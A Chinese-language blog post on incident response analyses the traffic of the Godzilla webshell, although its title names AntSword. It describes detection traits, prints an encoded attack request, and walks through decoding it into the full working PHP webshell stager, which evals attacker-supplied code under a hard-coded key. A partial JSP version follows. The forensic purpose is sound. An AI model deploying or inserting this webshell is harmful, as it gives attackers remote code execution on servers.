蚁剑流量分析和溯源

webshell 蚁剑 流量分析 应急响应
June 15, 2025
1 min read
By bx

Table of Contents

This is a list of all the sections in this post. Click on any of them to jump to that section.

哥斯拉流量分析和溯源

哥斯拉流量分析和溯源

:::info 哥斯拉版本—v4.01

:::

特征

哥斯拉客户端使用 JAVA 语言编写,如果没有配置的话,请求头可能是 java…,但是默认都是配置请求配置的,如下图所示

Cookie 这里结尾会有一个分号

响应体如下

具体格式如下

md5 前十六位 + base64 + md5 后十六位

在客户端首次连接时,会有连续三个请求

同时哥斯拉的加密方式是基于对称密码AES的

具体分析

PHP

加密器类型如下

执行命令

TCP 流量如下

ant=eval%28base64_decode%28strrev%28urldecode%28%27K0QfK0QfgACIgoQD9BCIgACIgACIK0wOpkXZrRCLhRXYkRCKlR2bj5WZ90VZtFmTkF2bslXYwRyWO9USTNVRT9FJgACIgACIgACIgACIK0wepU2csFmZ90TIpIybm5WSzNWazFmQ0V2ZiwSY0FGZkgycvBnc0NHKgYWagACIgACIgAiCNsXZzxWZ9BCIgAiCNsTK2EDLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKpkXZrRCLpEGdhRGJo4WdyBEKlR2bj5WZoUGZvNmbl9FN2U2chJGIvh2YlBCIgACIgACIK0wOpYTMsADLpkXZrRiLzNXYwRCK1QWboIHdzJWdzByboNWZgACIgACIgAiCNsTKkF2bslXYwRCKsFmdllQCK0QfgACIgACIgAiCNsTK5V2akwCZh9Gb5FGckgSZk92YuVWPkF2bslXYwRCIgACIgACIgACIgAiCNsXKlNHbhZWP90TKi8mZul0cjl2chJEdldmIsQWYvxWehBHJoM3bwJHdzhCImlGIgACIgACIgoQD7kSeltGJs0VZtFmTkF2bslXYwRyWO9USTNVRT9FJoUGZvNmbl1DZh9Gb5FGckACIgACIgACIK0wepkSXl1WYORWYvxWehBHJb50TJN1UFN1XkgCdlN3cphCImlGIgACIK0wOpkXZrRCLp01czFGcksFVT9EUfRCKlR2bjVGZfRjNlNXYihSZk92YuVWPhRXYkRCIgACIK0wepkSXzNXYwRyWUN1TQ9FJoQXZzNXaoAiZppQD7cSY0IjM1EzY5EGOiBTZ2M2Mn0TeltGJK0wOnQWYvxWehB3J9UWbh5EZh9Gb5FGckoQD7cSelt2J9M3chBHJK0QfK0wOERCIuJXd0VmcgACIgoQD9BCIgAiCNszYk4VXpRyWERCI9ASXpRyWERCIgACIgACIgoQD70VNxYSMrkGJbtEJg0DIjRCIgACIgACIgoQD7BSKrsSaksTKERCKuVGbyR3c8kGJ7ATPpRCKy9mZgACIgoQD7lySkwCRkgSZk92YuVGIu9Wa0Nmb1ZmCNsTKwgyZulGdy9GclJ3Xy9mcyVGQK0wOpADK0lWbpx2Xl1Wa09FdlNHQK0wOpgCdyFGdz9lbvl2czV2cApQD%27%29%29%29%29%3B&key=fL1tMGI4YTljzn78f8Wo%2FyhTN1cCWEn3M%2BF4ZGJ%2BL2Iz5Ep7TupOFkzm%2Bhr7%2BbBk0Riq%2BC30rG0xAYdhAfgsHqr%2BKsEp9CxcgTffeJ98LEWt%2Bah9rnNgOQqYkoN%2FNGEz

就拿这个而言

先 URL 解码

再对内部进行,字符串反转

input_str = ""
reversed_str = input_str[::-1]
print(f"反转后的字符串:{reversed_str}")
 
#DQpAc2Vzc2lvbl9zdGFydCgpOw0KQHNldF90aW1lX2xpbWl0KDApOw0KQGVycm9yX3JlcG9ydGluZygwKTsNCmZ1bmN0aW9uIGVuY29kZSgkRCwkSyl7DQogICAgZm9yKCRpPTA7JGk8c3RybGVuKCREKTskaSsrKSB7DQogICAgICAgICRjID0gJEtbJGkrMSYxNV07DQogICAgICAgICREWyRpXSA9ICREWyRpXV4kYzsNCiAgICB9DQogICAgcmV0dXJuICREOw0KfQ0KJHBhc3M9J2tleSc7DQokcGF5bG9hZE5hbWU9J3BheWxvYWQnOw0KJGtleT0nM2M2ZTBiOGE5YzE1MjI0YSc7DQppZiAoaXNzZXQoJF9QT1NUWyRwYXNzXSkpew0KICAgICRkYXRhPWVuY29kZShiYXNlNjRfZGVjb2RlKCRfUE9TVFskcGFzc10pLCRrZXkpOw0KICAgIGlmIChpc3NldCgkX1NFU1NJT05bJHBheWxvYWROYW1lXSkpew0KICAgICAgICAkcGF5bG9hZD1lbmNvZGUoJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV0sJGtleSk7DQogICAgICAgIGlmIChzdHJwb3MoJHBheWxvYWQsImdldEJhc2ljc0luZm8iKT09PWZhbHNlKXsNCiAgICAgICAgICAgICRwYXlsb2FkPWVuY29kZSgkcGF5bG9hZCwka2V5KTsNCiAgICAgICAgfQ0KCQlldmFsKCRwYXlsb2FkKTsNCiAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRwYXNzLiRrZXkpLDAsMTYpOw0KICAgICAgICBlY2hvIGJhc2U2NF9lbmNvZGUoZW5jb2RlKEBydW4oJGRhdGEpLCRrZXkpKTsNCiAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRwYXNzLiRrZXkpLDE2KTsNCiAgICB9ZWxzZXsNCiAgICAgICAgaWYgKHN0cnBvcygkZGF0YSwiZ2V0QmFzaWNzSW5mbyIpIT09ZmFsc2Upew0KICAgICAgICAgICAgJF9TRVNTSU9OWyRwYXlsb2FkTmFtZV09ZW5jb2RlKCRkYXRhLCRrZXkpOw0KICAgICAgICB9DQogICAgfQ0KfQ0K

再 base64 解码

参数里的代码只是建立了一个接收和执行后续加密指令的通道。

@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='key';
$payloadName='payload';
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            $payload=encode($payload,$key);
        }
		eval($payload);
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

java

处理过后的格式如下

<%!
String xc = "3c6e0b8a9c15224a";
String pass = "pass";
String md5 = md5(pass + xc);
class X extends ClassLoader { public Class Q(byte[] cb) { ... } }
public byte[] x(byte[] s, boolean m) { ... }
public static String md5(String s) { ... }
public static String base64Encode(byte[] bs) throws Exception { ... }
public static byte[] base64Decode(String bs) throws Exception { ... }
%>
<%
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        
    %>